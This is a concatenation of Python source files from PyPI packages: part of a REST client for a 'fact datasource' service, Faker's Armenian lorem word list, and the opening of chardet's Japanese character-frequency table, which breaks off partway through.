r = do_service(f"/remote/fd-service/{fd_code}", method="put", data=request, return_type="json",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return None
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def save_or_updates(self, fd_code: str, result_list: list) -> list:
"""
        Insert or update (upsert) data.
        :param fd_code: the unique code of the fd
        :param result_list: the data to insert or update
:return:
"""
if result_list is None:
return None
if not isinstance(result_list, list):
raise IllegalArgumentException("输入的参数:result_list 不是数组")
check_instance_avaliable()
request = []
for result in result_list:
if not isinstance(result, Munch):
                # Append values of any other type as-is
                request.append(result)
            else:
                # It is a Munch, so convert it to a plain dict
request.append(result.toDict())
try:
r = do_service(f"/remote/fd-service/{fd_code}/upsert", method="post", data=request, return_type="json",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return None
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def delete_all(self, fd_code: str):
"""
        Delete all data in the dataset.
        :param fd_code: the unique code of the fd
:return:
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}", method="delete", return_type="None",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def delete(self, fd_code: str, query: str):
"""
        Delete the data in the dataset matched by the query statement.
        :param fd_code: the unique code of the fd
        :param query: the query statement
:return:
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/query", method="delete", params={'query': query},
return_type="None",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def delete_conditions(self, fd_code: str, condition_groups: list):
"""
        Build a delete statement from the given delete conditions.
:param fd_code:
:param condition_groups:
:return:
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/conditions", method="delete", data=condition_groups,
return_type="None",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def get_fact_datasource_fields(self, fd_code: str):
"""
        Get the fields of the fd.
:param fd_code:
:return: List<FactDatasourceField>
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/fields", method="get",
return_type="json", headers={HeaderHolder.SITE: HeaderHolder.get_value(HeaderHolder.SITE),
HeaderHolder.PROJECT_CODE: HeaderHolder.get_value(
HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return None
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def exists_fds(self, fds):
"""
        Check whether the fds exist.
:param fds:
:return:
"""
if fds is None:
return False
if not isinstance(fds, list):
raise IllegalArgumentException("检测fd是否存在失败,输入参数不是一个list")
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/exists", method="post", data=fds,headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
return r
else:
return False
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
@Value("${sobeycube.factdatasource.distributed-mode:False}")
def distributed_mode():
pass
class FactDatasourceProxyFactory(Singleton):
__instance = None
def get_fd_client_proxy(self, mode: bool = None) -> FactDatasourceProxy:
if self.__instance:
return self.__instance
if mode is None:
mode = distributed_mode()
if mode:
log.info("服务启动,使用本地模式FD服务")
# 获取本地操作实例
self.__instance = DistributedFactDatasourceProxy.instance()
else:
log.info("服务启动,使用中心模式FD服务")
self.__instance = CentralizedFactDatasourceProxy.instance()
return self.__instance
def fd_client_proxy() -> FactDatasourceProxy:
return FactDatasourceProxyFactory.instance().get_fd_client_proxy() | PypiClean |
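

# --- Usage sketch (illustrative only; "demo_fd" and its fields are placeholders) ---
# client = fd_client_proxy()
# if client.exists_fds(["demo_fd"]):
#     client.inserts("demo_fd", [{"id": 1, "name": "example"}])
#     print(client.size("demo_fd"))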
/Faker-19.3.1.tar.gz/Faker-19.3.1/faker/providers/lorem/hy_AM/__init__.py | from typing import Dict
from .. import Provider as LoremProvider
class Provider(LoremProvider):
"""Implement lorem provider for ``hy_AM`` locale.
Sources:
- https://www.101languages.net/armenian/armenian-word-list
"""
word_list = (
"ես",
"դու",
"նա",
"մենք",
"դուք",
"նրանք",
"այս",
"այն",
"այստեղ",
"այնտեղ",
"ով",
"ինչ",
"որտեղ",
"ուր",
"երբ",
"ինչպես",
"ոչ",
"բոլոր",
"շատ",
"որոշ",
"քիչ",
"այլ",
"ուրիշ",
"մեկ",
"երկու",
"երեք",
"չորս",
"հինգ",
"մեծ",
"երկար",
"լայն",
"հաստ",
"ծանր",
"փոքր",
"կարճ",
"նեղ",
"բարակ",
"կին",
"տղամարդ",
"մարդ",
"երեխա",
"կին",
"ամուսին",
"մայր",
"հայր",
"կենդանի",
"ձուկ",
"թռչուն",
"շուն",
"ոջիլ",
"օձ",
"ճիճու",
"ծառ",
"անտառ",
"փայտ",
"պտուղ",
"սերմ",
"տերև",
"արմատ",
"կեղև",
"ծաղիկ",
"խոտ",
"պարան",
"մաշկ",
"կաշի",
"միս",
"արյուն",
"ոսկոր",
"ճարպ",
"ձու",
"եղջյուր",
"պոզ",
"պոչ",
"փետուր",
"մազ",
"գլուխ",
"ականջ",
"աչք",
"քիթ",
"բերան",
"ատամ",
"լեզու",
"եղունգ",
"ոտք",
"ծունկ",
"ձեռք",
"թև",
"փոր",
"փորոտիք",
"աղիք",
"վիզ",
"մեջք",
"կուրծք",
"սիրտ",
"լյարդ",
"խմել",
"ուտել",
"կծել",
"ծծել",
"թքել",
"ործկալ",
"փչել",
"շնչել",
"ծիծաղել",
"տեսնել",
"լսել",
"իմանալ",
"գիտենալ",
"մտածել",
"զգալ",
"վախենալ",
"քնել",
"ապրել",
"մեռնել",
"սպանել",
"կռվել",
"որսալ",
"խփել",
"հարվածել",
"կտրել",
"բաժանել",
"խոցել",
"քերծել",
"քորել",
"փորել",
"լողալ",
"թռչել",
"քայլել",
"գալ",
"պառկել",
"նստել",
"կանգնել",
"շրջվել",
"ընկնել",
"տալ",
"պահել",
"բռնել",
"սեղմել",
"շփել",
"լվալ",
"սրբել",
"ձգել",
"քաշել",
"հրել",
"նետել",
"կապել",
"կարել",
"հաշվել",
"ասել",
"երգել",
"խաղալ",
"լողալ",
"հոսել",
"սառչել",
"ուռել",
"արև",
"լուսին",
"աստղ",
"ջուր",
"անձրև",
"գետ",
"լիճ",
"ծով",
"աղ",
"քար",
"ավազ",
"փոշի",
"հող",
"ամպ",
"մառախուղ",
"մշուշ",
"երկինք",
"քամի",
"ձյուն",
"սառույց",
"ծուխ",
"հուր",
"կրակ",
"մոխիր",
"վառվել",
"այրվել",
"ճամփա",
"ճանապարհ",
"լեռ",
"սար",
"կարմիր",
"կանաչ",
"դեղին",
"սպիտակ",
"սև",
"գիշեր",
"օր",
"տարի",
"տաք",
"ցուրտ",
"լիքը",
"նոր",
"հին",
"լավ",
"վատ",
"փտած",
"կեղտոտ",
"ուղիղ",
"կլոր",
"սուր",
"բութ",
"հարթ",
"թաց",
"չոր",
"ճիշտ",
"մոտ",
"հեռու",
"աջ",
)
parts_of_speech: Dict[str, tuple] = {} | PypiClean |
/OBITools-1.2.13.tar.gz/OBITools-1.2.13/distutils.ext/obidistutils/serenity/pip/_vendor/requests/packages/chardet/jisfreq.py |
# Sampling from about 20M text materials, including literature and computer technology
#
# Japanese frequency table, applied to both S-JIS and EUC-JP
# They are sorted in order.
# 128 --> 0.77094
# 256 --> 0.85710
# 512 --> 0.92635
# 1024 --> 0.97130
# 2048 --> 0.99431
#
# Ideal Distribution Ratio = 0.92635 / (1-0.92635) = 12.58
# Random Distribution Ratio = 512 / (2965+62+83+86-512) = 0.191
#
# Typical Distribution Ratio, 25% of IDR
JIS_TYPICAL_DISTRIBUTION_RATIO = 3.0
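# (roughly 0.25 * 12.58 ≈ 3.1, rounded to 3.0 here)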
# Char to FreqOrder table
JIS_TABLE_SIZE = 4368
JISCharToFreqOrder = (
40, 1, 6, 182, 152, 180, 295,2127, 285, 381,3295,4304,3068,4606,3165,3510, # 16
3511,1822,2785,4607,1193,2226,5070,4608, 171,2996,1247, 18, 179,5071, 856,1661, # 32
1262,5072, 619, 127,3431,3512,3230,1899,1700, 232, 228,1294,1298, 284, 283,2041, # 48
2042,1061,1062, 48, 49, 44, 45, 433, 434,1040,1041, 996, 787,2997,1255,4305, # 64
2108,4609,1684,1648,5073,5074,5075,5076,5077,5078,3687,5079,4610,5080,3927,3928, # 80
5081,3296,3432, 290,2285,1471,2187,5082,2580,2825,1303,2140,1739,1445,2691,3375, # 96
1691,3297,4306,4307,4611, 452,3376,1182,2713,3688,3069,4308,5083,5084,5085,5086, # 112
5087,5088,5089,5090,5091,5092,5093,5094,5095,5096,5097,5098,5099,5100,5101,5102, # 128
5103,5104,5105,5106,5107,5108,5109,5110,5111,5112,4097,5113,5114,5115,5116,5117, # 144
5118,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,5130,5131,5132,5133, # 160
5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148,5149, # 176
5150,5151,5152,4612,5153,5154,5155,5156,5157,5158,5159,5160,5161,5162,5163,5164, # 192
5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,1472, 598, 618, 820,1205, # 208
1309,1412,1858,1307,1692,5176,5177,5178,5179,5180,5181,5182,1142,1452,1234,1172, # 224
1875,2043,2149,1793,1382,2973, 925,2404,1067,1241, 960,1377,2935,1491, 919,1217, # 240
1865,2030,1406,1499,2749,4098,5183,5184,5185,5186,5187,5188,2561,4099,3117,1804, # 256
2049,3689,4309,3513,1663,5189,3166,3118,3298,1587,1561,3433,5190,3119,1625,2998, # 272
3299,4613,1766,3690,2786,4614,5191,5192,5193,5194,2161, 26,3377, 2,3929, 20, # 288
3691, 47,4100, 50, 17, 16, 35, 268, 27, 243, 42, 155, 24, 154, 29, 184, # 304
4, 91, 14, 92, 53, 396, 33, 289, 9, 37, 64, 620, 21, 39, 321, 5, # 320
12, 11, 52, 13, 3, 208, 138, 0, 7, 60, 526, 141, 151,1069, 181, 275, # 336
1591, 83, 132,1475, 126, 331, 829, 15, 69, 160, 59, 22, 157, 55,1079, 312, # 352
109, 38, 23, 25, 10, 19, 79,5195, 61, 382,1124, 8, 30,5196,5197,5198, # 368
5199,5200,5201,5202,5203,5204,5205,5206, 89, 62, 74, 34,2416, 112, 139, 196, # 384
271, 149, 84, 607, 131, 765, 46, 88, 153, 683, 76, 874, 101, 258, 57, 80, # 400
32, 364, 121,1508, 169,1547, 68, 235, 145,2999, 41, 360,3027, 70, 63, 31, # 416
43, 259, 262,1383, 99, 533, 194, 66, 93, 846, 217, 192, 56, 106, 58, 565, # 432
280, 272, 311, 256, 146, 82, 308, 71, 100, 128, 214, 655, 110, 261, 104,1140, # 448
54, 51, 36, 87, 67,3070, 185,2618,2936,2020, 28,1066,2390,2059,5207,5208, # 464
5209,5210,5211,5212,5213,5214,5215,5216,4615,5217,5218,5219,5220,5221,5222,5223, # 480
5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234,5235,5236,3514,5237,5238, # 496
5239,5240,5241,5242,5243,5244,2297,2031,4616,4310,3692,5245,3071,5246,3598,5247, # 512
4617,3231,3515,5248,4101,4311,4618,3808,4312,4102,5249,4103,4104,3599,5250,5251, # 528
5252,5253,5254,5255,5256,5257,5258,5259,5260,5261,5262,5263,5264,5265,5266,5267, # 544
5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278,5279,5280,5281,5282,5283, # 560
5284,5285,5286,5287,5288,5289,5290,5291,5292,5293,5294,5295,5296,5297,5298,5299, # 576
5300,5301,5302,5303,5304,5305,5306,5307,5308,5309,5310,5311,5312,5313,5314,5315, # 592
5316,5317,5318,5319,5320,5321,5322,5323,5324,5325,5326,5327,5328,5329,5330,5331, # 608
5332,5333,5334,5335,5336,5337,5338,5339,5340,5341,5342,5343,5344,5345,5346,5347, # 624
5348,5349,5350,5351,5352,5353,5354,5355,5356,5357,5358,5359,5360,5361,5362,5363, # 640
5364,5365,5366,5367,5368,5369,5370,5371,5372,5373,5374,5375,5376,5377,5378,5379, # 656
5380,5381, 363, 642,2787,2878,2788,2789,2316,3232,2317,3434,2011, 165,1942,3930, # 672
3931,3932,3933,5382,4619,5383,4620,5384,5385,5386,5387,5388,5389,5390,5391,5392, # 688
5393,5394,5395,5396,5397,5398,5399,5400,5401,5402,5403,5404,5405,5406,5407,5408, # 704
5409,5410,5411,5412,5413,5414,5415,5416,5417,5418,5419,5420,5421,5422,5423,5424, # 720
5425,5426,5427,5428,5429,5430,5431,5432,5433,5434,5435,5436,5437,5438,5439,5440, # 736
5441,5442,5443,5444,5445,5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456, # 752
5457,5458,5459,5460,5461,5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472, # 768
5473,5474,5475,5476,5477,5478,5479,5480,5481,5482,5483,5484,5485,5486,5487,5488, # 784
5489,5490,5491,5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504, # 800
5505,5506,5507,5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520, # 816
5521,5522,5523,5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536, # 832
5537,5538,5539,5540,5541,5542,5543,5544,5545,5546,5547,5548,5549,5550,5551,5552, # 848
5553,5554,5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568, # 864
5569,5570,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584, # 880
5585,5586,5587,5588,5589,5590,5591,5592,5593,5594,5595,5596,5597,5598,5599,5600, # 896
5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,5615,5616, # 912
5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631,5632, # 928
5633,5634,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646,5647,5648, # 944
5649,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660,5661,5662,5663,5664, # 960
5665,5666,5667,5668,5669,5670,5671,5672,5673,5674,5675,5676,5677,5678,5679,5680, # 976
5681,5682,5683,5684,5685,5686,5687,5688,5689,5690,5691,5692,5693,5694,5695,5696, # 992
5697,5698,5699,5700,5701,5702,5703,5704,5705,5706,5707,5708,5709,5710,5711,5712, # 1008
5713,5714,5715,5716,5717,5718,5719,5720,5721,5722,5723,5724,5725,5726,5727,5728, # 1024
5729,5730,5731,5732,5733,5734,5735,5736,5737,5738,5739,5740,5741,5742,5743,5744, # 1040
5745,5746,5747,5748,5749,5750,5751,5752,5753,5754,5755,5756,5757,5758,5759,5760, # 1056
5761,5762,5763,5764,5765,5766,5767,5768,5769,5770,5771,5772,5773,5774,5775,5776, # 1072
5777,5778,5779,5780,5781,5782,5783,5784,5785,5786,5787,5788,5789,5790,5791,5792, # 1088
5793,5794,5795,5796,5797,5798,5799,5800,5801,5802,5803,5804,5805,5806,5807,5808, # 1104
5809,5810,5811,5812,5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824, # 1120
5825,5826,5827,5828,5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840, # 1136
5841,5842,5843,5844,5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856, # 1152
5857,5858,5859,5860,5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872, # 1168
5873,5874,5875,5876,5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888, # 1184
5889,5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904, # 1200
5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920, # 1216
5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936, # 1232
5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952, # 1248
5953,5954,5955,5956,5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968, # 1264
5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984, # 1280
5985,5986,5987,5988,5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,6000, # 1296
6001,6002,6003,6004,6005,6006,6007,6008,6009,6010,6011,6012,6013,6014,6015,6016, # 1312
6017,6018,6019,6020,6021,6022,6023,6024,6025,6026,6027,6028,6029,6030,6031,6032, # 1328
6033,6034,6035,6036,6037,6038,6039,6040,6041,6042,6043,6044,6045,6046,6047,6048, # 1344
6049,6050,6051,6052,6053,6054,6055,6056,6057,6058,6059,6060,6061,6062,6063,6064, # 1360
6065,6066,6067,6068,6069,6070,6071,6072,6073,6074,6075,6076,6077,6078,6079,6080, # 1376
6081,6082,6083,6084,6085,6086,6087,6088,6089,6090,6091,6092,6093,6094,6095,6096, # 1392
6097,6098,6099,6100,6101,6102,6103,6104,6105,6106,6107,6108,6109,6110,6111,6112, # 1408
6113,6114,2044,2060,4621, 997,1235, 473,1186,4622, 920,3378,6115,6116, 379,1108, # 1424
4313,2657,2735,3934,6117,3809, 636,3233, 573,1026,3693,3435,2974,3300,2298,4105, # 1440
854,2937,2463, 393,2581,2417, 539, 752,1280,2750,2480, 140,1161, 440, 708,1569, # 1456
665,2497,1746,1291,1523,3000, 164,1603, 847,1331, 537,1997, 486, 508,1693,2418, # 1472
1970,2227, 878,1220, 299,1030, 969, 652,2751, 624,1137,3301,2619, 65,3302,2045, # 1488
1761,1859,3120,1930,3694,3516, 663,1767, 852, 835,3695, 269, 767,2826,2339,1305, # 1504
896,1150, 770,1616,6118, 506,1502,2075,1012,2519, 775,2520,2975,2340,2938,4314, # 1520
3028,2086,1224,1943,2286,6119,3072,4315,2240,1273,1987,3935,1557, 175, 597, 985, # 1536
3517,2419,2521,1416,3029, 585, 938,1931,1007,1052,1932,1685,6120,3379,4316,4623, # 1552
804, 599,3121,1333,2128,2539,1159,1554,2032,3810, 687,2033,2904, 952, 675,1467, # 1568
3436,6121,2241,1096,1786,2440,1543,1924, 980,1813,2228, 781,2692,1879, 728,1918, # 1584
3696,4624, 548,1950,4625,1809,1088,1356,3303,2522,1944, 502, 972, 373, 513,2827, # 1600
586,2377,2391,1003,1976,1631,6122,2464,1084, 648,1776,4626,2141, 324, 962,2012, # 1616
2177,2076,1384, 742,2178,1448,1173,1810, 222, 102, 301, 445, 125,2420, 662,2498, # 1632
277, 200,1476,1165,1068, 224,2562,1378,1446, 450,1880, 659, 791, 582,4627,2939, # 1648
3936,1516,1274, 555,2099,3697,1020,1389,1526,3380,1762,1723,1787,2229, 412,2114, # 1664
1900,2392,3518, 512,2597, 427,1925,2341,3122,1653,1686,2465,2499, 697, 330, 273, # 1680
380,2162, 951, 832, 780, 991,1301,3073, 965,2270,3519, 668,2523,2636,1286, 535, # 1696
1407, 518, 671, 957,2658,2378, 267, 611,2197,3030,6123, 248,2299, 967,1799,2356, # 1712
850,1418,3437,1876,1256,1480,2828,1718,6124,6125,1755,1664,2405,6126,4628,2879, # 1728
2829, 499,2179, 676,4629, 557,2329,2214,2090, 325,3234, 464, 811,3001, 992,2342, # 1744
2481,1232,1469, 303,2242, 466,1070,2163, 603,1777,2091,4630,2752,4631,2714, 322, # 1760
2659,1964,1768, 481,2188,1463,2330,2857,3600,2092,3031,2421,4632,2318,2070,1849, # 1776
2598,4633,1302,2254,1668,1701,2422,3811,2905,3032,3123,2046,4106,1763,1694,4634, # 1792
1604, 943,1724,1454, 917, 868,2215,1169,2940, 552,1145,1800,1228,1823,1955, 316, # 1808
1080,2510, 361,1807,2830,4107,2660,3381,1346,1423,1134,4108,6127, 541,1263,1229, # 1824
1148,2540, 545, 465,1833,2880,3438,1901,3074,2482, 816,3937, 713,1788,2500, 122, # 1840
1575, 195,1451,2501,1111,6128, 859, 374,1225,2243,2483,4317, 390,1033,3439,3075, # 1856
2524,1687, 266, 793,1440,2599, 946, 779, 802, 507, 897,1081, 528,2189,1292, 711, # 1872
1866,1725,1167,1640, 753, 398,2661,1053, 246, 348,4318, 137,1024,3440,1600,2077, # 1888
2129, 825,4319, 698, 238, 521, 187,2300,1157,2423,1641,1605,1464,1610,1097,2541, # 1904
1260,1436, 759,2255,1814,2150, 705,3235, 409,2563,3304, 561,3033,2005,2564, 726, # 1920
1956,2343,3698,4109, 949,3812,3813,3520,1669, 653,1379,2525, 881,2198, 632,2256, # 1936
1027, 778,1074, 733,1957, 514,1481,2466, 554,2180, 702,3938,1606,1017,1398,6129, # 1952
1380,3521, 921, 993,1313, 594, 449,1489,1617,1166, 768,1426,1360, 495,1794,3601, # 1968
1177,3602,1170,4320,2344, 476, 425,3167,4635,3168,1424, 401,2662,1171,3382,1998, # 1984
1089,4110, 477,3169, 474,6130,1909, 596,2831,1842, 494, 693,1051,1028,1207,3076, # 2000
606,2115, 727,2790,1473,1115, 743,3522, 630, 805,1532,4321,2021, 366,1057, 838, # 2016
684,1114,2142,4322,2050,1492,1892,1808,2271,3814,2424,1971,1447,1373,3305,1090, # 2032
1536,3939,3523,3306,1455,2199, 336, 369,2331,1035, 584,2393, 902, 718,2600,6131, # 2048
2753, 463,2151,1149,1611,2467, 715,1308,3124,1268, 343,1413,3236,1517,1347,2663, # 2064
2093,3940,2022,1131,1553,2100,2941,1427,3441,2942,1323,2484,6132,1980, 872,2368, # 2080
2441,2943, 320,2369,2116,1082, 679,1933,3941,2791,3815, 625,1143,2023, 422,2200, # 2096
3816,6133, 730,1695, 356,2257,1626,2301,2858,2637,1627,1778, 937, 883,2906,2693, # 2112
3002,1769,1086, 400,1063,1325,3307,2792,4111,3077, 456,2345,1046, 747,6134,1524, # 2128
884,1094,3383,1474,2164,1059, 974,1688,2181,2258,1047, 345,1665,1187, 358, 875, # 2144
3170, 305, 660,3524,2190,1334,1135,3171,1540,1649,2542,1527, 927, 968,2793, 885, # 2160
1972,1850, 482, 500,2638,1218,1109,1085,2543,1654,2034, 876, 78,2287,1482,1277, # 2176
861,1675,1083,1779, 724,2754, 454, 397,1132,1612,2332, 893, 672,1237, 257,2259, # 2192
2370, 135,3384, 337,2244, 547, 352, 340, 709,2485,1400, 788,1138,2511, 540, 772, # 2208
1682,2260,2272,2544,2013,1843,1902,4636,1999,1562,2288,4637,2201,1403,1533, 407, # 2224
576,3308,1254,2071, 978,3385, 170, 136,1201,3125,2664,3172,2394, 213, 912, 873, # 2240
3603,1713,2202, 699,3604,3699, 813,3442, 493, 531,1054, 468,2907,1483, 304, 281, # 2256
4112,1726,1252,2094, 339,2319,2130,2639, 756,1563,2944, 748, 571,2976,1588,2425, # 2272
2715,1851,1460,2426,1528,1392,1973,3237, 288,3309, 685,3386, 296, 892,2716,2216, # 2288
1570,2245, 722,1747,2217, 905,3238,1103,6135,1893,1441,1965, 251,1805,2371,3700, # 2304
2601,1919,1078, 75,2182,1509,1592,1270,2640,4638,2152,6136,3310,3817, 524, 706, # 2320
1075, 292,3818,1756,2602, 317, 98,3173,3605,3525,1844,2218,3819,2502, 814, 567, # 2336
385,2908,1534,6137, 534,1642,3239, 797,6138,1670,1529, 953,4323, 188,1071, 538, # 2352
178, 729,3240,2109,1226,1374,2000,2357,2977, 731,2468,1116,2014,2051,6139,1261, # 2368
1593, 803,2859,2736,3443, 556, 682, 823,1541,6140,1369,2289,1706,2794, 845, 462, # 2384
2603,2665,1361, 387, 162,2358,1740, 739,1770,1720,1304,1401,3241,1049, 627,1571, # 2400
2427,3526,1877,3942,1852,1500, 431,1910,1503, 677, 297,2795, 286,1433,1038,1198, # 2416
2290,1133,1596,4113,4639,2469,1510,1484,3943,6141,2442, 108, 712,4640,2372, 866, # 2432
3701,2755,3242,1348, 834,1945,1408,3527,2395,3243,1811, 824, 994,1179,2110,1548, # 2448
1453, 790,3003, 690,4324,4325,2832,2909,3820,1860,3821, 225,1748, 310, 346,1780, # 2464
2470, 821,1993,2717,2796, 828, 877,3528,2860,2471,1702,2165,2910,2486,1789, 453, # 2480
359,2291,1676, 73,1164,1461,1127,3311, 421, 604, 314,1037, 589, 116,2487, 737, # 2496
837,1180, 111, 244, 735,6142,2261,1861,1362, 986, 523, 418, 581,2666,3822, 103, # 2512
855, 503,1414,1867,2488,1091, 657,1597, 979, 605,1316,4641,1021,2443,2078,2001, # 2528
1209, 96, 587,2166,1032, 260,1072,2153, 173, 94, 226,3244, 819,2006,4642,4114, # 2544
2203, 231,1744, 782, 97,2667, 786,3387, 887, 391, 442,2219,4326,1425,6143,2694, # 2560
633,1544,1202, 483,2015, 592,2052,1958,2472,1655, 419, 129,4327,3444,3312,1714, # 2576
1257,3078,4328,1518,1098, 865,1310,1019,1885,1512,1734, 469,2444, 148, 773, 436, # 2592
1815,1868,1128,1055,4329,1245,2756,3445,2154,1934,1039,4643, 579,1238, 932,2320, # 2608
353, 205, 801, 115,2428, 944,2321,1881, 399,2565,1211, 678, 766,3944, 335,2101, # 2624
1459,1781,1402,3945,2737,2131,1010, 844, 981,1326,1013, 550,1816,1545,2620,1335, # 2640
1008, 371,2881, 936,1419,1613,3529,1456,1395,2273,1834,2604,1317,2738,2503, 416, # 2656
1643,4330, 806,1126, 229, 591,3946,1314,1981,1576,1837,1666, 347,1790, 977,3313, # 2672
764,2861,1853, 688,2429,1920,1462, 77, 595, 415,2002,3034, 798,1192,4115,6144, # 2688
2978,4331,3035,2695,2582,2072,2566, 430,2430,1727, 842,1396,3947,3702, 613, 377, # 2704
278, 236,1417,3388,3314,3174, 757,1869, 107,3530,6145,1194, 623,2262, 207,1253, # 2720
2167,3446,3948, 492,1117,1935, 536,1838,2757,1246,4332, 696,2095,2406,1393,1572, # 2736
3175,1782, 583, 190, 253,1390,2230, 830,3126,3389, 934,3245,1703,1749,2979,1870, # 2752
2545,1656,2204, 869,2346,4116,3176,1817, 496,1764,4644, 942,1504, 404,1903,1122, # 2768
1580,3606,2945,1022, 515, 372,1735, 955,2431,3036,6146,2797,1110,2302,2798, 617, # 2784
6147, 441, 762,1771,3447,3607,3608,1904, 840,3037, 86, 939,1385, 572,1370,2445, # 2800
1336, 114,3703, 898, 294, 203,3315, 703,1583,2274, 429, 961,4333,1854,1951,3390, # 2816
2373,3704,4334,1318,1381, 966,1911,2322,1006,1155, 309, 989, 458,2718,1795,1372, # 2832
1203, 252,1689,1363,3177, 517,1936, 168,1490, 562, 193,3823,1042,4117,1835, 551, # 2848
470,4645, 395, 489,3448,1871,1465,2583,2641, 417,1493, 279,1295, 511,1236,1119, # 2864
72,1231,1982,1812,3004, 871,1564, 984,3449,1667,2696,2096,4646,2347,2833,1673, # 2880
3609, 695,3246,2668, 807,1183,4647, 890, 388,2333,1801,1457,2911,1765,1477,1031, # 2896
3316,3317,1278,3391,2799,2292,2526, 163,3450,4335,2669,1404,1802,6148,2323,2407, # 2912
1584,1728,1494,1824,1269, 298, 909,3318,1034,1632, 375, 776,1683,2061, 291, 210, # 2928
1123, 809,1249,1002,2642,3038, 206,1011,2132, 144, 975, 882,1565, 342, 667, 754, # 2944
